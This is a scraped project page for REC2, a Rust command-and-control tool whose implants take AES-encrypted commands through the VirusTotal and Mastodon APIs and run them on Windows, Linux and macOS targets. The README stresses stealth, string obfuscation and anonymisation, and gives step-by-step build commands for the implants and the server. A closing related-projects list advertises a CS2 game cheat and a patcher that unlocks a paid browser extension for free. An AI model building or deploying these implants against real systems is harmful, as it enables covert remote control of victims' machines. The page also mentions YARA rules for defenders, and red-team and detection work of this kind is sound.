REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust. 🦀

Overview

:shipit: Information: REC2 is an old personal project (early 2023) that I didn't continue development on. It's part of a list of projects that helped me to learn Rust. The code is probably considered obsolete and not in its best form. Maybe I'll pick up where I left off #roadmap. However, REC2 is fully functional and allow to execute commands on a Linux / macOS or Windows target from the VirusTotal and Mastodon APIs.

REC2 (Rusty External C2)

GitHub Windows supported Linux supported macOS supported Twitter Follow

logo

⚠️ Disclaimer: REC2 is for educational purposes only. Use this at your own discretion, I cannot be held responsible for any damages caused. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and are not responsible for any misuse or damage caused by this tool.

🔴 Redteamer: I share with you a beta version of one of my external C2 using virustotal and mastodon

🔵 Blueteamer: You can find an example of yara rules for REC2 implants in this same repo

🧮 Summary

🏷️ Description

REC2, or Rusty External Command and Control, is a versatile Command and Control (C2) tool developed in the Rust programming language. It provides a discreet and effective means to manage remote implants (clients) on macOS, Linux, and Windows systems. REC2 utilizes third-party APIs like VirusTotal or Mastodon to transmit encrypted messages using AES between the server and implants, allowing attackers to operate stealthily through these external channels. Implants can monitor pending jobs, retrieve, decrypt, execute tasks on the target system, and securely transmit results back via the same APIs. Using these APIs as intermediaries adds an extra layer of anonymization, reducing the ease of tracing back to the attacker.

schema

📺 Usage and Demo

server client.exe

Change some values in implants/(mastodon,virustotal)/src/main.rs :

// (MASTODON or VIRUSTOTAL) TOKEN 
// <https://mastodon.be/settings/applications>
// <https://developers.virustotal.com/reference/authentication>
let token = lc!("TOKEN").to_owned();
// (MASTODON or VIRUSTOTAL) FULL URL
//let full_url = lc!("https://mastodon.xx/@username/100123451234512345").to_owned();
let full_url = lc!("https://www.virustotal.com/gui/file/99ff0b679081cdca00eb27c5be5fd9428f1a7cf781cc438b937cf8baf8551c4d").to_owned();

Make Windows x64 implant static binary:

make virustotal_windows
make mastodon_windows

You can find (rec2_virustotal_x64.exe or rec2_mastodon_x64.exe) in your current directory.

And to finish, compile the server binary:

make c2server_release
./server_release -h
./server_release VirusTotal -h
./server_release Mastodon -h

# Example
./server_release VirusTotal --url <URL> --token <TOKEN> --key <AES_KEY>

Now you just need to execute implant in your target.

🚜 How to compile it?

Using Makefile

You can use the make command to compile it for Linux, Windows or mac0S.

More command in the Makefile:

REC2 Server:
usage: make c2server_debug
usage: make c2server_release
usage: make c2server_windows
usage: make c2server_windows_x64
usage: make c2server_windows_x86
usage: make c2server_linux
usage: make c2server_linux_aarch64
usage: make c2server_linux_x86_64
usage: make c2server_macos
usage: make c2server_arm_musl
usage: make c2server_armv7

VirusTotal implant:
usage: make virustotal_debug
usage: make virustotal_release
usage: make virustotal_windows
usage: make virustotal_windows_x64
usage: make virustotal_windows_x86
usage: make virustotal_linux
usage: make virustotal_linux_aarch64
usage: make virustotal_linux_x86_64
usage: make virustotal_macos
usage: make virustotal_arm_musl
usage: make virustotal_armv7

Mastodon implant:
usage: make mastodon_debug
usage: make mastodon_release
usage: make mastodon_windows
usage: make mastodon_windows_x64
usage: make mastodon_windows_x86
usage: make mastodon_linux
usage: make mastodon_linux_aarch64
usage: make mastodon_linux_x86_64
usage: make mastodon_macos
usage: make mastodon_arm_musl
usage: make mastodon_armv7

Dependencies:
usage: make install_windows_deps
usage: make install_macos_deps

Documentation:
usage: make c2server_doc
usage: make virustotal_doc
usage: make mastodon_doc

Cleaning:
usage: make clean

Using Dockerfile

Build REC2 with docker to make sure to have all dependencies.

docker build --rm -t rec2 .

# Then to build C2 server:
docker run --rm -v ./:/usr/src/rec2 rec2 c2server_windows
docker run --rm -v ./:/usr/src/rec2 rec2 c2server_linux
docker run --rm -v ./:/usr/src/rec2 rec2 c2server_macos


# Then to build VirusTotal implant:
docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_windows
docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_linux
docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_macos

# Then to build Mastodon implant:
docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_windows
docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_linux
docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_macos
SHOW MORE

Using Cargo

You will need to install Rust on your system.

https://www.rust-lang.org/fr/tools/install

:warining: You need to export LITCRYPT_ENCRYPT_KEY variable in your terminal before to compile it. (for implants strings obfuscation)

export LITCRYPT_ENCRYPT_KEY="MYSUPERPASSWORD1234567890"
LITCRYPT_ENCRYPT_KEY="MYSUPERPASSWORD1234567890"

:warining: You need to change AESKEY in implants/(virustotal,mastodon)/main.rs and to change URL and TOKEN.

Here is how to compile the "release" and "debug" versions using the cargo command.

git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choise your implant Mastodon or VirusTotal

# implants/mastodon/Cargo.toml
# release version
cargo build --release --manifest --manifest-path implants/mastodon/Cargo.toml
# or debug version
cargo b --manifest-path implants/mastodon/Cargo.toml

# implants/virustotal/Cargo.toml
# release version
cargo build --release --manifest --manifest-path implants/virustotal/Cargo.toml
# or debug version
cargo b --manifest-path implants/virustotal/Cargo.toml

# Server
cargo build --release --manifest --manifest-path server/Cargo.toml
# or debug version
cargo b --manifest-path server/Cargo.toml

The Implants result can be found in the implants/(mastodon,virustotal)/target/release or in the implants/(mastodon,virustotal)/target/debug folder. The server result can be found in the server/target/release or in the server/target/debug folder.

Below you can find the compilation methodology for each of the OS from Linux. If you need another compilation system, please consult the list in this link: https://doc.rust-lang.org/nightly/rustc/platform-support.html

Manually for Linux x86_64 static version

# Install rustup and Cargo for Linux
curl https://sh.rustup.rs -sSf | sh

# Add Linux deps
rustup install stable-x86_64-unknown-linux-gnu
rustup target add x86_64-unknown-linux-gnu

# Static compilation for Linux
git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choise your implant Mastodon or VirusTotal

# implants/mastodon/Cargo.toml
CFLAGS="-lrt";LDFLAGS="-lrt";RUSTFLAGS='-C target-feature=+crt-static';cargo build --release --target x86_64-unknown-linux-gnu --manifest-path implants/mastodon/Cargo.toml

# implants/virustotal/Cargo.toml
CFLAGS="-lrt";LDFLAGS="-lrt";RUSTFLAGS='-C target-feature=+crt-static';cargo build --release --target x86_64-unknown-linux-gnu --manifest-path implants/virustotal/Cargo.toml

# Server
CFLAGS="-lrt";LDFLAGS="-lrt";RUSTFLAGS='-C target-feature=+crt-static';cargo build --release --target x86_64-unknown-linux-gnu --manifest-path server/Cargo.toml

The result can be found in the implants/(mastodon,virustotal)/target/x86_64-unknown-linux-gnu/release or in server/target/x86_64-unknown-linux-gnu/release folder.

Manually for Windows static version from Linux

# Install rustup and Cargo in Linux
curl https://sh.rustup.rs -sSf | sh

# Add Windows deps
rustup install stable-x86_64-pc-windows-gnu
rustup target add x86_64-pc-windows-gnu

# Static compilation for Windows
git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choise your implant Mastodon or VirusTotal

# implants/mastodon/Cargo.toml
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path implants/mastodon/Cargo.toml

# implants/virustotal/Cargo.toml
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path implants/virustotal/Cargo.toml

# Server
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path server/Cargo.toml

The result can be found in the implants/(mastodon,virustotal)/target/x86_64-pc-windows-gnu/release or in the server/target/x86_64-pc-windows-gnu/release folder.

Manually for macOS static version from Linux

Amazing documentation: https://wapl.es/rust/2019/02/17/rust-cross-compile-linux-to-macos.html

# Install rustup and Cargo in Linux
curl https://sh.rustup.rs -sSf | sh

# Add macOS tool chain
sudo git clone https://github.com/tpoechtrager/osxcross /usr/local/bin/osxcross
sudo wget -P /usr/local/bin/osxcross/ -nc https://s3.dockerproject.org/darwin/v2/MacOSX10.10.sdk.tar.xz && sudo mv /usr/local/bin/osxcross/MacOSX10.10.sdk.tar.xz /usr/local/bin/osxcross/tarballs/
sudo UNATTENDED=yes OSX_VERSION_MIN=10.7 /usr/local/bin/osxcross/build.sh
sudo chmod 775 /usr/local/bin/osxcross/ -R
export PATH="/usr/local/bin/osxcross/target/bin:$PATH"

# Cargo needs to be told to use the correct linker for the x86_64-apple-darwin target, so add the following to your project’s .cargo/config file:
grep 'target.x86_64-apple-darwin' ~/.cargo/config || echo "[target.x86_64-apple-darwin]" >> ~/.cargo/config
grep 'linker = "x86_64-apple-darwin14-clang"' ~/.cargo/config || echo 'linker = "x86_64-apple-darwin14-clang"' >> ~/.cargo/config
grep 'ar = "x86_64-apple-darwin14-clang"' ~/.cargo/config || echo 'ar = "x86_64-apple-darwin14-clang"' >> ~/.cargo/config

# Static compilation for macOS
git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choise your implant Mastodon or VirusTotal

# implants/mastodon/Cargo.toml
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-apple-darwin --manifest-path implants/mastodon/Cargo.toml

# implants/virustotal/Cargo.toml
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-apple-darwin --manifest-path implants/virustotal/Cargo.toml

# Server
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-apple-darwin --manifest-path server/Cargo.toml

The result can be found in the implants/(mastodon,virustotal)/target/x86_64-apple-darwin/release folder.

How to build the documentation?

git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choise your implant Mastodon or VirusTotal

# implants/mastodon/Cargo.toml
cargo doc --open --no-deps --manifest-path implants/mastodon/Cargo.toml

# implants/virustotal/Cargo.toml
cargo doc --open --no-deps --manifest-path implants/virustotal/Cargo.toml

# Server
cargo doc --open --no-deps --manifest-path server/Cargo.toml

🚦 Roadmap

🔗 Links

You might also like...
AUR external package builder

AUR Build Server Goal This project aims to provide an external package making server based on any PKGBUILD based project. Right now it pulls AUR packa

Open-source, external CS2 cheat.
Open-source, external CS2 cheat.

🎮 ProExt - A game enhancer for CS2 📋 Features: ESP 👁️ Aimbot 🎯 Triggerbot 💨 Crosshair ⌖ Radar 📡 Bomb Timer 💣 Spectator List 👀 Styling 🖌️ ...a

The PC-based component of a two-part Linux driver for using a TI calculator as an external keyboard
The PC-based component of a two-part Linux driver for using a TI calculator as an external keyboard

Introduction i68apollo is the computer-based component of the two-part i68 (*I*nput from Motorola *68*000[fn:4]-based calculator) prototype userspace

A rust library that allows you to host the CLR and execute dotnet binaries.
A rust library that allows you to host the CLR and execute dotnet binaries.

ClrOxide ClrOxide is a rust library that allows you to host the CLR and dynamically execute dotnet binaries. I wanted to call it Kepler for no particu

Execute Rust code carefully, with extra checking along the way

cargo-careful cargo careful is a tool to run your Rust code extra carefully -- opting into a bunch of nightly-only extra checks that help detect Undef

🌌⭐cosmo is a wrapper for Git essentially, allowing you to compress multiple commands into one
🌌⭐cosmo is a wrapper for Git essentially, allowing you to compress multiple commands into one

❯ Cosmo Git tooling of the future New feature: Cosmo hooks! Click here for more info! ❯ 👀 Features Config files (with defaults!) Fast Easy to use Fri

This automatically patches the RoPro extension for you, allowing you to have pro_tier for free.

RoPro Patcher This automatically patches the RoPro extension for you, allowing you to have pro_tier for free. NOTE Chrome, Brave (and possibly other b

Execute Javascript code in the Dioxus, and get the return value ( for Dioxus )

Golde Dioxus Execute Javascript code in the Dioxus, and get the return value. This demo can help use Javascript to calc the + operator formula. use di

Workflows make it easy to browse, search, execute and share commands (or a series of commands)--without needing to leave your terminal.
Workflows make it easy to browse, search, execute and share commands (or a series of commands)--without needing to leave your terminal.

Workflows The repo for all public Workflows that appear within Warp and within commands.dev. To learn how to create local or repository workflows, see

Owner
Quentin Texier (g0h4n)
Pentester and Red Team Operator 🇫🇷
Quentin Texier (g0h4n)
👁️ A tool to execute a certain command when a target file is modified.

Ojo Ojo is a simple utility that allows you to execute a specific command each time a certain file is being saved. Usage Let's say you are sick the fo

Tarek Kunze 13 Dec 25, 2022
A CLI companion tool for paste.misterio.me, allowing you to easily upload and manage your pastes

This is a CLI companion tool for paste.misterio.me, allowing you to easily upload and manage your pastes, as well as download any pastes you want.

Gabriel Fontes 1 Jan 26, 2022
⌚ A command-line tool (and library) for the rusty Swatch Internet Time.

⌚ A command-line tool (and library) for the rusty Swatch Internet Time. Comes with XBar/Swiftbar support.

Gil Desmarais 4 Jul 18, 2022
A very simple third-party cargo subcommand to execute a custom command

cargo-x A very simple third-party cargo subcommand to execute a custom command Usage install cargo-x cargo install cargo-x or upgrade cargo install -

刘冲 9 Dec 26, 2022
A command line tool to control the power state of Valve Base Stations 2.0.

lighthousectl A command line tool to control the power state of Valve Base Stations 2.0. Usage Scan All Base Stations It scans endlessly. You can stop

KOBA789 11 Aug 9, 2022
A command and control framework written in rust.

Tempest Tempest is a command and control framework written in 100% Rust. blog post: https://teach2breach.io/tempest-intro/ slides: https://teach2breac

Kirk Trychel 275 Oct 23, 2024
Cucumber testing framework for Rust. Fully native, no external test runners or dependencies.

Cucumber testing framework for Rust An implementation of the Cucumber testing framework for Rust. Fully native, no external test runners or dependenci

Cucumber Rust 393 Dec 31, 2022
A file server that supports static serving, uploading, searching, accessing control, webdav...

Dufs Dufs is a distinctive utility file server that supports static serving, uploading, searching, accessing control, webdav... Features Serve static

null 3.6k Oct 30, 2023
Sero is a web server that allows you to easily host your static sites without pain. The idea was inspired by surge.sh but gives you full control.

sero Lightning-fast, static web publishing with zero configuration and full control ?? Table Of Contents ?? Table Of Contents ?? Tools ❓ About The Pro

Dmitry Miasnenko 6 Nov 13, 2023
Execution of and interaction with external processes and pipelines

subprocess The subprocess library provides facilities for execution of and interaction with external processes and pipelines, inspired by Python's sub

Hrvoje Nikšić 375 Jan 2, 2023